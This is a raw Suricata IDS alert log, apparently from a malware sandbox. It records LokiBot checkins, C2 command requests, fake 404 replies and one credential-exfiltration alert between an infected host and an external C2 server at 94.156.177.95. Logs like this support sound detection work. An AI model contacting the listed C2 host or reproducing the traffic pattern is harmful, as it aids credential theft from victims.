Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49779 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49825 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49879 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49779 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49779 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49742
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49832 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49802 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49818 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49825 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49802 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49743
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49759
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49879 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49818 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49773 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49918 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49765
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49757
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49746
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49860 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49888 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49802 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49762
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49879 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49818 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49860 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49849 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49832 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49753
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49740 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49860 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49918 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49849 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49860
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49832 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49832 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49773
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49767 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49808 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49758
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49918 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49879
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49818
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49825
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49849
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49918 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49918 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49802 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49802 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49802
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49888 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49936 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49808 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49808 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49923 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50016 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50016 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49744
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50016 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49936 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49767 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49936 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49767 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49767 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49767 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49936 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49936 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50016 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50016 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49923 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49888 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49905
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49832
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49763
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49936
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49855 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49978 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49808 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:50054 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50010 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49923 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50010 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50010 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49895 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49748
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49895 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49895 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49971 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49855 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49855 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:49971
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49895 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49888 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49888 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49855 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49865 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49855 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50084 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:50084 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:50084 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49923 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.4:50016
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49869 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49985 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49978 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49808 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49978 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49895 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49965 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49865 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:50030 -> 94.156.177.95:80
